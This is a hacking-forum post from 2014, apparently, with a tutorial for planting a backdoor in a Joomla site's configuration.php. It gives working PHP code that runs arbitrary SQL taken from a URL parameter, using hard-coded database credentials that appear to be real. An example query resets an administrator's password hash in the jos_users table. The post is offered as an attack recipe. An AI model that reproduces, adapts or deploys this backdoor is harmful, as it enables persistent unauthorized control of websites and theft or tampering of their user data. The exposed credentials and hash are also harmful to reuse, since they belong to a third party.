in this article I will show how to install backdoor and run in command and upload shell
1.first you need shell and edit file configuration.php
For example :
2. edit file configuration.php and add to this code user and pass and .. to source code Down
3. save file configuration.php
4. open file configuration and address bar and add address this code ?cmd=mysql&query=
For example :
5. you can update database mysql and run command
For example :http://www.site.com/configuration.php?cmd=mysql&query=[/url] select * from jos_users update jos_users set password='eae778eac6f9a329d3423880227d5dda:xZmZbqy XTL3ho2p0vFKPJHRMvWM5KpFa' where id=62
<?php if ($_GET['cmd']=='mysql') { $dbhost = "localhost"; $dbname = "thegapuc_gapuc"; $dbuser = "thegapuc_admin"; $dbpasswd = "GaPuc1050W"; if(get_magic_quotes_gpc()) $query = stripslashes($_GET['query']); else $query = $_GET['query']; $dbh = mysql_connect($dbhost, $dbuser, $dbpasswd) or die("Unable to connect to MySQL Server"); $selected = mysql_select_db($dbname,$dbh); $result = mysql_query($query); if(!$result) die("Nothing Returned.<br><br>" . mysql_error()); // results echo "<html>rn". strtoupper($query) . "<br>rn<table border ="1">rn"; $count = 0; while ($row = mysql_fetch_assoc($result)) { echo "<tr>rn"; if ($count==0) // list column names { echo "<tr>rn"; while($key = key($row)) { echo "<td><b>" . $key . "</b></td>rn"; next($row); } echo "</tr>rn"; } foreach($row as $r) // list content of column names { if ($r=='') $r = '<font color=red>NULL</font>'; echo "<td>" . $r . "</td>rn"; } echo "</tr>rn"; $count++; } echo "</table>nr" . $count . " rows returned.rn</html>"; } ?>
/1337 , ??4?‡0???„“1?’3 , madcodE , shadow008 ,Sniffer, b0x , Invectus
Bearbeitet von sniffer, 15 September 2014 - 21:51 Uhr.